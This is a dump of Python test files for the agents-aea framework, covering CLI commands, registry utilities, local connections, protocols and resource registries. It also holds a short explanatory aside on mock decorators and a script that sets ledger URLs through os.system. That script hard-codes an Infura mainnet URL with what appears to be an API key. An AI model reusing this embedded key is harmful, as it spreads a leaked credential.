os.chdir(cls.cwd)
try:
shutil.rmtree(cls.t)
except (OSError, IOError):
pass
class TestCreateFailsWhenConfigFileIsNotCompliant:
"""Test that 'aea create' sub-command fails when the generated configuration file is not compliant with the schema."""
@classmethod
def setup_class(cls):
"""Set up the test class."""
cls.runner = CliRunner()
cls.agent_name = "myagent"
        # change the serialization of the AgentConfig class so as to make the parsing fail.
cls.patch = patch.object(aea.configurations.base.AgentConfig, "json", return_value={"hello": "world"})
cls.patch.__enter__()
cls.cwd = os.getcwd()
cls.t = tempfile.mkdtemp()
os.chdir(cls.t)
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "create", cls.agent_name], standalone_mode=False)
def test_exit_code_equal_to_1(self):
"""Test that the error code is equal to 1 (i.e. catchall for general errors)."""
assert self.result.exit_code == 1
def test_agent_folder_is_not_created(self):
"""Test that the agent folder is removed."""
assert not Path(self.agent_name).exists()
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
cls.patch.__exit__()
os.chdir(cls.cwd)
try:
shutil.rmtree(cls.t)
except (OSError, IOError):
pass
class TestCreateFailsWhenExceptionOccurs:
"""Test that 'aea create' sub-command fails when the generated configuration file is not compliant with the schema."""
@classmethod
def setup_class(cls):
"""Set up the test class."""
cls.runner = CliRunner()
cls.agent_name = "myagent"
        # make the dump of the agent configuration raise an exception.
cls.patch = patch.object(ConfigLoader, "dump", side_effect=Exception)
cls.patch.__enter__()
cls.cwd = os.getcwd()
cls.t = tempfile.mkdtemp()
os.chdir(cls.t)
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "create", cls.agent_name], standalone_mode=False)
def test_exit_code_equal_to_1(self):
"""Test that the error code is equal to 1 (i.e. catchall for general errors)."""
assert self.result.exit_code == 1
def test_agent_folder_is_not_created(self):
"""Test that the agent folder is removed."""
assert not Path(self.agent_name).exists()
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
cls.patch.__exit__()
os.chdir(cls.cwd)
try:
shutil.rmtree(cls.t)
except (OSError, IOError):
pass
```
#### File: tests/test_cli/test_install.py
```python
import os
import tempfile
import unittest.mock
from pathlib import Path
import yaml
from ..common.click_testing import CliRunner
import aea.cli.common
from aea.cli import cli
from aea.configurations.base import DEFAULT_PROTOCOL_CONFIG_FILE
from tests.conftest import CLI_LOG_OPTION, CUR_PATH
class TestInstall:
"""Test that the command 'aea install' works as expected."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.runner = CliRunner()
cls.cwd = os.getcwd()
os.chdir(Path(CUR_PATH, "data", "dummy_aea"))
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "install"], standalone_mode=False)
def test_exit_code_equal_to_zero(self):
"""Assert that the exit code is equal to zero (i.e. success)."""
assert self.result.exit_code == 0
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
os.chdir(cls.cwd)
class TestInstallFromRequirementFile:
"""Test that the command 'aea install --requirement REQ_FILE' works."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.runner = CliRunner()
cls.cwd = os.getcwd()
os.chdir(Path(CUR_PATH, "data", "dummy_aea"))
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "install", "-r", "requirements.txt"], standalone_mode=False)
def test_exit_code_equal_to_zero(self):
"""Assert that the exit code is equal to zero (i.e. success)."""
assert self.result.exit_code == 0
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
os.chdir(cls.cwd)
class TestInstallFails:
"""Test that the command 'aea install' fails when a dependency is not found."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.runner = CliRunner()
cls.agent_name = "myagent"
cls.patch = unittest.mock.patch.object(aea.cli.common.logger, 'error')
cls.mocked_logger_error = cls.patch.__enter__()
cls.cwd = os.getcwd()
cls.t = tempfile.mkdtemp()
os.chdir(cls.t)
result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "create", cls.agent_name], standalone_mode=False)
assert result.exit_code == 0
os.chdir(cls.agent_name)
result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "scaffold", "protocol", "my_protocol"], standalone_mode=False)
assert result.exit_code == 0
config_path = Path("protocols", "my_protocol", DEFAULT_PROTOCOL_CONFIG_FILE)
config = yaml.safe_load(open(config_path))
config.setdefault("dependencies", []).append("this_dependency_does_not_exist")
yaml.safe_dump(config, open(config_path, "w"))
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "install"], standalone_mode=False)
def test_exit_code_equal_to_1(self):
"""Assert that the exit code is equal to 1 (i.e. catchall for general errors)."""
assert self.result.exit_code == 1
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
os.chdir(cls.cwd)
```
#### File: test_cli/test_registry/test_utils.py
```python
import os
from unittest import TestCase, mock
from click import ClickException
from aea.cli.registry.utils import (
fetch_package, request_api, split_public_id, _download_file, _extract
)
from aea.cli.registry.settings import REGISTRY_API_URL
@mock.patch(
'aea.cli.registry.utils.split_public_id',
return_value=['owner', 'name', 'version']
)
@mock.patch(
'aea.cli.registry.utils.request_api',
return_value={'file': 'url'}
)
@mock.patch(
'aea.cli.registry.utils._download_file',
return_value='filepath'
)
@mock.patch('aea.cli.registry.utils._extract')
class FetchPackageTestCase(TestCase):
"""Test case for fetch_package method."""
def test_fetch_package_positive(
self,
_extract_mock,
_download_file_mock,
request_api_mock,
split_public_id_mock
):
"""Test for fetch_package method positive result."""
obj_type = 'connection'
public_id = 'owner/name:version'
cwd = 'cwd'
fetch_package(obj_type, public_id, cwd)
split_public_id_mock.assert_called_with(public_id)
request_api_mock.assert_called_with(
'GET', '/connections/owner/name/version'
)
_download_file_mock.assert_called_once_with('url', 'cwd')
_extract_mock.assert_called_once_with('filepath', 'cwd/connections')
@mock.patch('aea.cli.registry.utils.requests.request')
class RequestAPITestCase(TestCase):
"""Test case for request_api method."""
def test_request_api_positive(self, request_mock):
"""Test for fetch_package method positive result."""
expected_result = {'correct': 'json'}
resp_mock = mock.Mock()
resp_mock.json = lambda: expected_result
resp_mock.status_code = 200
request_mock.return_value = resp_mock
result = request_api('GET', '/path')
request_mock.assert_called_once_with(
method='GET',
params=None,
url=REGISTRY_API_URL + '/path'
)
self.assertEqual(result, expected_result)
def test_request_api_404(self, request_mock):
"""Test for fetch_package method 404 sever response."""
resp_mock = mock.Mock()
resp_mock.status_code = 404
request_mock.return_value = resp_mock
with self.assertRaises(ClickException):
request_api('GET', '/path')
def test_request_api_403(self, request_mock):
"""Test for fetch_package method not authorized sever response."""
resp_mock = mock.Mock()
resp_mock.status_code = 403
request_mock.return_value = resp_mock
with self.assertRaises(ClickException):
request_api('GET', '/path')
def test_request_api_unexpected_response(self, request_mock):
"""Test for fetch_package method unexpected sever response."""
resp_mock = mock.Mock()
resp_mock.status_code = 500
request_mock.return_value = resp_mock
with self.assertRaises(ClickException):
request_api('GET', '/path')
class SplitPublicIDTestCase(TestCase):
"""Test case for request_api method."""
def test_split_public_id_positive(self):
"""Test for split_public_id method positive result."""
public_id = 'owner/name:version'
expected_result = ['owner', 'name', 'version']
result = split_public_id(public_id)
self.assertEqual(result, expected_result)
@mock.patch('aea.cli.registry.utils.requests.get')
class DownloadFileTestCase(TestCase):
"""Test case for _download_file method."""
@mock.patch('builtins.open', mock.mock_open())
def test_download_file_positive(self, get_mock):
"""Test for _download_file method positive result."""
filename = 'filename.tar.gz'
url = 'url/{}'.format(filename)
cwd = 'cwd'
filepath = os.path.join(cwd, filename)
resp_mock = mock.Mock()
raw_mock = mock.Mock()
raw_mock.read = lambda: 'file content'
resp_mock.raw = raw_mock
resp_mock.status_code = 200
get_mock.return_value = resp_mock
result = _download_file(url, cwd)
expected_result = filepath
self.assertEqual(result, expected_result)
get_mock.assert_called_once_with(url, stream=True)
def test_download_file_wrong_response(self, get_mock):
"""Test for _download_file method wrong response from file server."""
resp_mock = mock.Mock()
resp_mock.status_code = 404
get_mock.return_value = resp_mock
with self.assertRaises(ClickException):
_download_file('url', 'cwd')
class ExtractTestCase(TestCase):
"""Test case for _extract method."""
@mock.patch('aea.cli.registry.utils.os.remove')
@mock.patch('aea.cli.registry.utils.tarfile.open')
def test_extract_positive(self, tarfile_open_mock, os_remove_mock):
"""Test for _extract method positive result."""
source = 'file.tar.gz'
target = 'target-folder'
tar_mock = mock.Mock()
tar_mock.extractall = lambda path: None
tar_mock.close = lambda: None
tarfile_open_mock.return_value = tar_mock
_extract(source, target)
tarfile_open_mock.assert_called_once_with(source, 'r:gz')
os_remove_mock.assert_called_once_with(source)
def test_extract_wrong_file_type(self):
"""Test for _extract method wrong file type."""
source = 'file.wrong'
target = 'target-folder'
with self.assertRaises(Exception):
_extract(source, target)
```
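A note on the decorator stacking used in `FetchPackageTestCase` above: when several `@mock.patch` decorators are applied, the mocks are passed to the test method bottom-up, so the decorator nearest the function supplies the first mock argument. A tiny self-contained illustration follows; the patched targets here are arbitrary examples, not part of the repository.

```python
from unittest import mock
import json
import os


@mock.patch("os.getcwd", return_value="/tmp")   # outermost decorator -> last mock argument
@mock.patch("json.dumps", return_value="{}")    # innermost decorator -> first mock argument
def show_argument_order(dumps_mock, getcwd_mock):
    assert json.dumps({"a": 1}) == "{}"   # json.dumps is patched
    assert os.getcwd() == "/tmp"          # os.getcwd is patched
    assert dumps_mock.called and getcwd_mock.called


show_argument_order()
```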
#### File: test_connections/test_local/test_misc.py
```python
import asyncio
import unittest.mock
import pytest
from aea.connections.local.connection import LocalNode, OEFLocalConnection
from aea.mail.base import Envelope, AEAConnectionError, Multiplexer
from aea.protocols.default.message import DefaultMessage
from aea.protocols.default.serialization import DefaultSerializer
from aea.protocols.fipa.message import FIPAMessage
from aea.protocols.fipa.serialization import FIPASerializer
def test_connection():
"""Test that two OEF local connection can connect to a local node."""
with LocalNode() as node:
multiplexer1 = Multiplexer([OEFLocalConnection("multiplexer1", node)])
multiplexer2 = Multiplexer([OEFLocalConnection("multiplexer2", node)])
multiplexer1.connect()
multiplexer2.connect()
multiplexer1.disconnect()
multiplexer2.disconnect()
@pytest.mark.asyncio
async def test_connection_twice_return_none():
"""Test that connecting twice works."""
with LocalNode() as node:
public_key = "public_key"
connection = OEFLocalConnection(public_key, node)
await connection.connect()
await node.connect(public_key, connection._reader)
message = DefaultMessage(type=DefaultMessage.Type.BYTES, content=b"hello")
message_bytes = DefaultSerializer().encode(message)
expected_envelope = Envelope(to=public_key, sender=public_key, protocol_id="default", message=message_bytes)
await connection.send(expected_envelope)
actual_envelope = await connection.receive()
assert expected_envelope == actual_envelope
await connection.disconnect()
@pytest.mark.asyncio
async def test_receiving_when_not_connected_raise_exception():
"""Test that when we try to receive an envelope from a not connected connection we raise exception."""
with pytest.raises(AEAConnectionError, match="Connection not established yet."):
with LocalNode() as node:
public_key = "public_key"
connection = OEFLocalConnection(public_key, node)
await connection.receive()
@pytest.mark.asyncio
async def test_receiving_returns_none_when_error_occurs():
"""Test that when we try to receive an envelope and an error occurs we return None."""
with LocalNode() as node:
public_key = "public_key"
connection = OEFLocalConnection(public_key, node)
await connection.connect()
with unittest.mock.patch.object(connection._reader, "get", side_effect=Exception):
result = await connection.receive()
assert result is None
await connection.disconnect()
def test_communication():
"""Test that two multiplexer can communicate through the node."""
with LocalNode() as node:
multiplexer1 = Multiplexer([OEFLocalConnection("multiplexer1", node)])
multiplexer2 = Multiplexer([OEFLocalConnection("multiplexer2", node)])
multiplexer1.connect()
multiplexer2.connect()
msg = DefaultMessage(type=DefaultMessage.Type.BYTES, content=b"hello")
msg_bytes = DefaultSerializer().encode(msg)
envelope = Envelope(to="multiplexer2", sender="multiplexer1", protocol_id=DefaultMessage.protocol_id, message=msg_bytes)
multiplexer1.put(envelope)
msg = FIPAMessage((str(0), ''), 0, 0, FIPAMessage.Performative.CFP, query=None)
msg_bytes = FIPASerializer().encode(msg)
envelope = Envelope(to="multiplexer2", sender="multiplexer1", protocol_id=FIPAMessage.protocol_id, message=msg_bytes)
multiplexer1.put(envelope)
msg = FIPAMessage((str(0), str(1)), 0, 0, FIPAMessage.Performative.PROPOSE, proposal=[])
msg_bytes = FIPASerializer().encode(msg)
envelope = Envelope(to="multiplexer2", sender="multiplexer1", protocol_id=FIPAMessage.protocol_id, message=msg_bytes)
multiplexer1.put(envelope)
msg = FIPAMessage((str(0), str(1)), 0, 0, FIPAMessage.Performative.ACCEPT)
msg_bytes = FIPASerializer().encode(msg)
envelope = Envelope(to="multiplexer2", sender="multiplexer1", protocol_id=FIPAMessage.protocol_id, message=msg_bytes)
multiplexer1.put(envelope)
msg = FIPAMessage((str(0), str(1)), 0, 0, FIPAMessage.Performative.DECLINE)
msg_bytes = FIPASerializer().encode(msg)
envelope = Envelope(to="multiplexer2", sender="multiplexer1", protocol_id=FIPAMessage.protocol_id, message=msg_bytes)
multiplexer1.put(envelope)
envelope = multiplexer2.get(block=True, timeout=1.0)
msg = DefaultSerializer().decode(envelope.message)
assert envelope.protocol_id == "default"
assert msg.get("content") == b"hello"
envelope = multiplexer2.get(block=True, timeout=1.0)
msg = FIPASerializer().decode(envelope.message)
assert envelope.protocol_id == "fipa"
assert msg.get("performative") == FIPAMessage.Performative.CFP
envelope = multiplexer2.get(block=True, timeout=1.0)
msg = FIPASerializer().decode(envelope.message)
assert envelope.protocol_id == "fipa"
assert msg.get("performative") == FIPAMessage.Performative.PROPOSE
envelope = multiplexer2.get(block=True, timeout=1.0)
msg = FIPASerializer().decode(envelope.message)
assert envelope.protocol_id == "fipa"
assert msg.get("performative") == FIPAMessage.Performative.ACCEPT
envelope = multiplexer2.get(block=True, timeout=1.0)
msg = FIPASerializer().decode(envelope.message)
assert envelope.protocol_id == "fipa"
assert msg.get("performative") == FIPAMessage.Performative.DECLINE
multiplexer1.disconnect()
multiplexer2.disconnect()
@pytest.mark.asyncio
async def test_connecting_to_node_with_same_key():
"""Test that connecting twice with the same key works correctly."""
with LocalNode() as node:
public_key = "my_public_key"
my_queue = asyncio.Queue()
ret = await node.connect(public_key, my_queue)
assert ret is not None and isinstance(ret, asyncio.Queue)
ret = await node.connect(public_key, my_queue)
assert ret is None
```
#### File: tests/test_helpers/test_base.py
```python
import os
import sys
from aea.connections.oef.connection import OEFConnection
from aea.helpers.base import locate
from ..conftest import CUR_PATH
class TestHelpersBase:
"""Test the helper functions."""
def test_locate(self):
"""Test the locate function to locate modules."""
cwd = os.getcwd()
os.chdir(os.path.join(CUR_PATH, ".."))
sys.modules["gym_connection"] = locate("packages.connections.gym")
assert sys.modules['gym_connection'] is not None
sys.modules["gym_connection"] = locate("packages.connections.weather")
assert sys.modules['gym_connection'] is None
os.chdir(cwd)
def test_locate_class(self):
"""Test the locate function to locate classes."""
cwd = os.getcwd()
os.chdir(os.path.join(CUR_PATH, ".."))
expected_class = OEFConnection
actual_class = locate("aea.connections.oef.connection.OEFConnection")
# although they are the same class, they are different instances in memory
# and the build-in default "__eq__" method does not compare the attributes.
# so compare the names
assert actual_class is not None
assert expected_class.__name__ == actual_class.__name__
os.chdir(cwd)
def test_locate_with_builtins(self):
"""Test that locate function returns the built-in."""
result = locate("int.bit_length")
assert int.bit_length == result
def test_locate_when_path_does_not_exist(self):
"""Test that locate function returns None when the dotted path does not exist."""
result = locate("aea.not.existing.path")
assert result is None
result = locate("ThisClassDoesNotExist")
assert result is None
```
#### File: tests/test_protocols/test_oef_message.py
```python
from unittest import mock
from aea.protocols.oef.message import OEFMessage
from aea.protocols.oef.models import DataModel, Attribute, Query, Constraint, ConstraintType, Description
from aea.protocols.oef.serialization import OEFSerializer
def test_oef_type_string_value():
"""Test the string value of the type."""
assert str(OEFMessage.Type.REGISTER_SERVICE) == "register_service",\
"The string representation must be register_service"
assert str(OEFMessage.Type.UNREGISTER_SERVICE) == "unregister_service",\
"The string representation must be unregister_service"
assert str(OEFMessage.Type.REGISTER_AGENT) == "register_agent",\
"The string representation must be register_agent"
assert str(OEFMessage.Type.UNREGISTER_AGENT) == "unregister_agent",\
"The string representation must be unregister_agent"
assert str(OEFMessage.Type.SEARCH_SERVICES) == "search_services",\
"The string representation must be search_services"
assert str(OEFMessage.Type.SEARCH_AGENTS) == "search_agents",\
"The string representation must be search_agents"
assert str(OEFMessage.Type.OEF_ERROR) == "oef_error",\
"The string representation must be oef_error"
assert str(OEFMessage.Type.DIALOGUE_ERROR) == "dialogue_error",\
"The string representation must be dialogue_error"
assert str(OEFMessage.Type.SEARCH_RESULT) == "search_result",\
"The string representation must be search_result"
def test_oef_message_consistency():
"""Tests the consistency of an OEFMessage."""
foo_datamodel = DataModel("foo", [Attribute("bar", int,
True, "A bar attribute.")])
msg = OEFMessage(
oef_type=OEFMessage.Type.SEARCH_AGENTS,
id=2,
query=Query([Constraint("bar", ConstraintType("==", 1))], model=foo_datamodel)
)
assert msg.check_consistency(), "We expect the consistency to return TRUE"
with mock.patch("aea.protocols.oef.message.OEFMessage.Type")\
as mock_type_enum:
mock_type_enum.SEARCH_AGENTS.value = "unknown"
assert not msg.check_consistency(),\
"Expect the consistency to return False"
attribute_foo = Attribute("foo", int, True, "a foo attribute.")
attribute_bar = Attribute("bar", str, True, "a bar attribute.")
data_model_foobar = DataModel("foobar", [attribute_foo, attribute_bar], "A foobar data model.")
description_foobar = Description({"foo": 1, "bar": "baz"}, data_model=data_model_foobar)
msg = OEFMessage(oef_type=OEFMessage.Type.REGISTER_AGENT,
id=0,
agent_description=description_foobar,
agent_id="public_key")
assert msg.check_consistency()
msg = OEFMessage(oef_type=OEFMessage.Type.UNREGISTER_AGENT, id=0, agent_description=description_foobar,
agent_id="public_key")
assert msg.check_consistency()
def test_oef_message_oef_error():
"""Tests the OEF_ERROR type of message."""
msg = OEFMessage(oef_type=OEFMessage.Type.OEF_ERROR, id=0,
operation=OEFMessage.OEFErrorOperation.SEARCH_AGENTS)
assert OEFMessage(oef_type=OEFMessage.Type.OEF_ERROR, id=0,
operation=OEFMessage.OEFErrorOperation.SEARCH_AGENTS),\
"Expects an oef message Error!"
msg_bytes = OEFSerializer().encode(msg)
assert len(msg_bytes) > 0,\
"Expects the length of bytes not to be Empty"
deserialized_msg = OEFSerializer().decode(msg_bytes)
assert msg == deserialized_msg,\
"Expected the deserialized_msg to me equals to msg"
def test_oef_message_dialogue_error():
    """Tests the OEFMessage of type DialogueError."""
assert OEFMessage(oef_type=OEFMessage.Type.DIALOGUE_ERROR,
id=0,
dialogue_id=1,
origin="myKey"),\
"Could not create the message of type DialogueError"
```
#### File: agents-aea/tests/test_registries.py
```python
import os
import random
import shutil
import tempfile
import unittest.mock
from pathlib import Path
import yaml
import aea
import aea.registries.base
from aea.aea import AEA
from aea.configurations.base import DEFAULT_AEA_CONFIG_FILE
from aea.crypto.ledger_apis import LedgerApis
from aea.crypto.wallet import Wallet
from aea.decision_maker.messages.transaction import TransactionMessage
from aea.protocols.base import Protocol
from aea.registries.base import ProtocolRegistry, Resources
from .conftest import CUR_PATH, DummyConnection
class TestProtocolRegistry:
"""Test the protocol registry."""
@classmethod
def setup_class(cls):
"""Set the tests up."""
cls.patch = unittest.mock.patch.object(aea.registries.base.logger, 'exception')
cls.mocked_logger = cls.patch.__enter__()
cls.oldcwd = os.getcwd()
cls.agent_name = "agent_dir_test"
cls.t = tempfile.mkdtemp()
cls.agent_folder = os.path.join(cls.t, cls.agent_name)
shutil.copytree(os.path.join(CUR_PATH, "data", "dummy_aea"), cls.agent_folder)
os.chdir(cls.agent_folder)
# make fake protocol
cls.fake_protocol_id = "fake"
agent_config_path = Path(cls.agent_folder, DEFAULT_AEA_CONFIG_FILE)
agent_config = yaml.safe_load(agent_config_path.read_text())
agent_config.get("protocols").append(cls.fake_protocol_id)
yaml.safe_dump(agent_config, open(agent_config_path, "w"))
Path(cls.agent_folder, "protocols", cls.fake_protocol_id).mkdir()
cls.registry = ProtocolRegistry()
cls.registry.populate(cls.agent_folder)
cls.expected_protocol_ids = {"default", "fipa"}
def test_not_able_to_add_bad_formatted_protocol_message(self):
"""Test that the protocol registry has not been able to add the protocol 'bad'."""
self.mocked_logger.assert_called_with("Not able to add protocol {}.".format(self.fake_protocol_id))
def test_fetch_all(self):
"""Test that the 'fetch_all' method works as expected."""
protocols = self.registry.fetch_all()
assert all(isinstance(p, Protocol) for p in protocols)
assert set(p.id for p in protocols) == self.expected_protocol_ids
def test_unregister(self):
"""Test that the 'unregister' method works as expected."""
protocol_id_removed = "default"
protocol_removed = self.registry.fetch(protocol_id_removed)
self.registry.unregister(protocol_id_removed)
expected_protocols_ids = set(self.expected_protocol_ids)
expected_protocols_ids.remove(protocol_id_removed)
assert set(p.id for p in self.registry.fetch_all()) == expected_protocols_ids
# restore the protocol
self.registry.register((protocol_id_removed, None), protocol_removed)
@classmethod
def teardown_class(cls):
"""Tear down the tests."""
cls.mocked_logger.__exit__()
shutil.rmtree(cls.t, ignore_errors=True)
os.chdir(cls.oldcwd)
class TestResources:
"""Test the resources class."""
@classmethod
def _patch_logger(cls):
cls.patch_logger_exception = unittest.mock.patch.object(aea.registries.base.logger, 'exception')
cls.mocked_logger_exception = cls.patch_logger_exception.__enter__()
cls.patch_logger_warning = unittest.mock.patch.object(aea.registries.base.logger, 'warning')
cls.mocked_logger_warning = cls.patch_logger_warning.__enter__()
@classmethod
def _unpatch_logger(cls):
cls.mocked_logger_exception.__exit__()
cls.mocked_logger_warning.__exit__()
@classmethod
def setup_class(cls):
"""Set the tests up."""
cls._patch_logger()
# create temp agent folder
cls.oldcwd = os.getcwd()
cls.agent_name = "agent_test" + str(random.randint(0, 1000))
cls.t = tempfile.mkdtemp()
cls.agent_folder = os.path.join(cls.t, cls.agent_name)
shutil.copytree(os.path.join(CUR_PATH, "data", "dummy_aea"), cls.agent_folder)
os.chdir(cls.agent_folder)
# make fake skill
cls.fake_skill_id = "fake"
agent_config_path = Path(cls.agent_folder, DEFAULT_AEA_CONFIG_FILE)
agent_config = yaml.safe_load(agent_config_path.read_text())
agent_config.get("skills").append(cls.fake_skill_id)
yaml.safe_dump(agent_config, open(agent_config_path, "w"))
Path(cls.agent_folder, "skills", cls.fake_skill_id).mkdir()
connections = [DummyConnection()]
private_key_pem_path = os.path.join(CUR_PATH, "data", "priv.pem")
wallet = Wallet({'default': private_key_pem_path})
ledger_apis = LedgerApis({})
cls.resources = Resources(os.path.join(cls.agent_folder))
cls.aea = AEA(cls.agent_name, connections, wallet, ledger_apis, resources=cls.resources)
cls.resources.load(cls.aea.context)
cls.expected_skills = {"dummy", "error"}
def test_unregister_handler(self):
"""Test that the unregister of handlers work correctly."""
assert len(self.resources.handler_registry.fetch_all()) == 3
error_handler = self.resources.handler_registry.fetch_by_skill("default", "error")
self.resources.handler_registry.unregister("error")
# unregister the handler and test that it has been actually unregistered.
assert self.resources.handler_registry.fetch_by_skill("default", "error") is None
handlers = self.resources.handler_registry.fetch_all()
assert len(handlers) == 2
assert handlers[0].__class__.__name__ == "DummyHandler"
dummy_handler = self.resources.handler_registry.fetch_by_skill("default", "dummy")
self.resources.handler_registry.unregister("dummy")
assert len(self.resources.handler_registry.fetch_all()) == 0
# restore the handlers
self.resources.handler_registry.register((None, "error"), [error_handler])
self.resources.handler_registry.register((None, "dummy"), [dummy_handler])
assert len(self.resources.handler_registry.fetch_all()) == 2
def test_fake_skill_loading_failed(self):
"""Test that when the skill is bad formatted, we print a log message."""
s = "A problem occurred while parsing the skill directory {}. Exception: {}".format(
os.path.join(self.agent_folder, "skills", "fake"),
"[Errno 2] No such file or directory: '" + os.path.join(self.agent_folder, "skills", "fake", "skill.yaml") + "'")
self.mocked_logger_warning.assert_called_once_with(s)
def test_remove_skill(self):
"""Test that the 'remove skill' method works correctly."""
error_skill = self.resources.get_skill("error")
self.resources.remove_skill("error")
assert self.resources.get_skill("error") is None
self.resources.add_skill(error_skill)
assert self.resources.get_skill("error") == error_skill
def test_register_behaviour_with_already_existing_skill_id(self):
"""Test that registering a behaviour with an already existing skill id behaves as expected."""
self.resources.behaviour_registry.register((None, "error"), [])
self.mocked_logger_warning.assert_called_with("Behaviours already registered with skill id 'error'")
def test_behaviour_registry(self):
"""Test that the behaviour registry behaves as expected."""
assert len(self.resources.behaviour_registry.fetch_all()) == 1
dummy_behaviours = self.resources.behaviour_registry.fetch("dummy")
self.resources.behaviour_registry.unregister("dummy")
assert self.resources.behaviour_registry.fetch("dummy") is None
self.resources.behaviour_registry.register((None, "dummy"), dummy_behaviours)
def test_register_task_with_already_existing_skill_id(self):
"""Test that registering a task with an already existing skill id behaves as expected."""
self.resources.task_registry.register((None, "error"), [])
self.mocked_logger_warning.assert_called_with("Tasks already registered with skill id 'error'")
def test_task_registry(self):
"""Test that the task registry behaves as expected."""
assert len(self.resources.task_registry.fetch_all()) == 1
dummy_tasks = self.resources.task_registry.fetch("dummy")
self.resources.task_registry.unregister("dummy")
assert self.resources.task_registry.fetch("dummy") is None
self.resources.task_registry.register((None, "dummy"), dummy_tasks)
def test_skill_loading(self):
"""Test that the skills have been loaded correctly."""
dummy_skill = self.resources.get_skill("dummy")
error_skill_context = dummy_skill.skill_context
handlers = dummy_skill.handlers
behaviours = dummy_skill.behaviours
tasks = dummy_skill.tasks
shared_classes = dummy_skill.shared_classes
assert handlers == error_skill_context.handlers
assert behaviours == error_skill_context.behaviours
assert tasks == error_skill_context.tasks
assert getattr(error_skill_context, "agent_name") == self.agent_name
assert handlers[0].context == dummy_skill.skill_context
assert behaviours[0].context == dummy_skill.skill_context
assert tasks[0].context == dummy_skill.skill_context
assert shared_classes[0].context == dummy_skill.skill_context
def test_handler_configuration_loading(self):
"""Test that the handler configurations are loaded correctly."""
default_handlers = self.resources.handler_registry.fetch("default")
assert len(default_handlers) == 2
handler1, handler2 = default_handlers[0], default_handlers[1]
dummy_handler = handler1 if handler1.__class__.__name__ == "DummyHandler" else handler2
assert dummy_handler.config == {
"handler_arg_1": 1,
"handler_arg_2": "2"
}
def test_behaviour_configuration_loading(self):
"""Test that the behaviour configurations are loaded correctly."""
dummy_behaviours = self.resources.behaviour_registry.fetch("dummy")
assert len(dummy_behaviours) == 1
dummy_behaviour = dummy_behaviours[0]
assert dummy_behaviour.config == {
"behaviour_arg_1": 1,
"behaviour_arg_2": "2"
}
def test_task_configuration_loading(self):
"""Test that the task configurations are loaded correctly."""
dummy_tasks = self.resources.task_registry.fetch("dummy")
assert len(dummy_tasks) == 1
dummy_task = dummy_tasks[0]
assert dummy_task.config == {
"task_arg_1": 1,
"task_arg_2": "2"
}
def test_shared_class_configuration_loading(self):
"""Test that the shared class configurations are loaded correctly."""
dummy_skill = self.resources.get_skill("dummy")
assert len(dummy_skill.shared_classes) == 1
dummy_shared_class = dummy_skill.shared_classes[0]
assert dummy_shared_class.config == {
"shared_class_arg_1": 1,
"shared_class_arg_2": "2"
}
@classmethod
def teardown_class(cls):
"""Tear the tests down."""
cls._unpatch_logger()
shutil.rmtree(cls.t, ignore_errors=True)
os.chdir(cls.oldcwd)
class TestFilter:
"""Test the resources class."""
@classmethod
def setup_class(cls):
"""Set the tests up."""
# create temp agent folder
cls.oldcwd = os.getcwd()
cls.agent_name = "agent_test" + str(random.randint(0, 1000))
cls.t = tempfile.mkdtemp()
cls.agent_folder = os.path.join(cls.t, cls.agent_name)
shutil.copytree(os.path.join(CUR_PATH, "data", "dummy_aea"), cls.agent_folder)
os.chdir(cls.agent_folder)
connections = [DummyConnection()]
private_key_pem_path = os.path.join(CUR_PATH, "data", "priv.pem")
wallet = Wallet({'default': private_key_pem_path})
ledger_apis = LedgerApis({})
cls.aea = AEA(cls.agent_name, connections, wallet, ledger_apis, resources=Resources(cls.agent_folder))
def test_handle_internal_messages(self):
"""Test that the internal messages are handled."""
self.aea.setup()
t = TransactionMessage(performative=TransactionMessage.Performative.ACCEPT,
skill_id="dummy",
transaction_id="transaction0",
sender="pk1",
counterparty="pk2",
is_sender_buyer=True,
currency_pbk="Unknown",
amount=2,
sender_tx_fee=0,
counterparty_tx_fee=0,
quantities_by_good_pbk={"Unknown": 10})
self.aea.decision_maker.message_out_queue.put(t)
self.aea.filter.handle_internal_messages()
internal_handler = self.aea.resources.handler_registry.fetch_by_skill("internal", "dummy")
assert len(internal_handler.handled_internal_messages) == 1
@classmethod
def teardown_class(cls):
"""Tear the tests down."""
shutil.rmtree(cls.t, ignore_errors=True)
os.chdir(cls.oldcwd)
``` |
{
"source": "8ball030/AutonomousHegician",
"score": 2
} |
#### File: agents/scripts/update_ah_with_ledger_connection.py
```python
import contextlib
import os
from typing import Tuple
@contextlib.contextmanager
def cd(path):
"""Change directory with context manager."""
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
os.chdir(old_cwd)
except Exception as e: # pylint: disable=broad-except # pragma: nocover
os.chdir(old_cwd)
raise e from e
connection_strings = {
"ganache_local": "http://localhost:7545",
"ganache_container": "http://ganachecli:7545",
"live": "https://mainnet.infura.io/v3/f00f7b3ba0e848ddbdc8941c527447fe", # todo
}
def parse_args():
def is_acceptable_input(input_):
acceptable = list(connection_strings.values())
if input_ in acceptable:
return input_
else:
raise ValueError(
f"{input_} is not a valid option. Must be one of {acceptable}"
)
var = os.environ.get("LEDGER")
return is_acceptable_input(var)
def update_ah_config_with_new_config(
ledger_string,
file_paths: Tuple[str, ...] = (
"./autonomous_hegician",
"./hegic_deployer",
),
):
"""Get the AH config and update it with ledger string."""
for file_path in file_paths:
with cd(file_path):
os.system(
f"aea -s config set vendor.fetchai.connections.ledger.config.ledger_apis.ethereum.address {ledger_string}"
)
def do_work():
"""Run the script."""
ledger_string = parse_args()
update_ah_config_with_new_config(
ledger_string,
)
print("Configurations copied.")
if __name__ == "__main__":
do_work()
``` |
